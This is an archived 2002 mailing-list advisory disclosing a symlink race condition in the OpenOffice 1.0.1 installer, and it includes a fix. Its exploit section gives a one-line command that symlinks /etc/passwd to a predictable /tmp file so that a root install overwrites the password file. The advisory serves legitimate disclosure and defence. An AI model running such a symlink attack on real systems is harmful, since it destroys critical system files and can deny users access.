OpenOffice 1.0.1 Race condition during installation.

From: Larry W. Cashdollar (lwcat_private)
Date: Fri Oct 11 2002 - 06:51:22 PDT

Next message: Olaf Schulz: "[VulnWatch] Apache Tomcat 3.x and 4.0.x: Remote denial-of-service vulnerability"

Previous message: buzheng: "prover of concept code of windows help overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

		 	Vapid Labs
                    Larry W. Cashdollar
			  9/9/02

Summary: OpenOffice 1.0.1 Race condition during installation can overwrite
system files.

Severity: Low

Description: A very simple and easy to exploit race condition exist during the
 installation of OpenOffice.  During this window a malicous user could create a
 symlink in /tmp and overwrite arbitrary files.

Exploit:

As a normal user:

lwc $ ln -s /etc/passwd /tmp/$USERNAME_autoresponse.conf

Where $USERNAME is the installer account name, probably root.

will result in the password file being over written with:

# create the proper autoresponse file
cat << EOF > /tmp/${USER}_autoresponse.conf
[ENVIRONMENT]
INSTALLATIONMODE=$installtype
INSTALLATIONTYPE=STANDARD
DESTINATIONPATH=$prefix/$oo_home
OUTERPATH=
LOGFILE=
LANGUAGELIST=<LANGUAGE>

[JAVA]
JavaSupport=preinstalled_or_none

EOF

Fix:
    Create a directory under /tmp to work from.  With restrictive permissions.

References:

http://www.openoffice.org/dev_docs/source/1.0.1/index.html

Larry W. Cashdollar
lwcat_private
http://vapid.ath.cx

Next message: Olaf Schulz: "[VulnWatch] Apache Tomcat 3.x and 4.0.x: Remote denial-of-service vulnerability"
Previous message: buzheng: "prover of concept code of windows help overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Oct 11 2002 - 09:54:54 PDT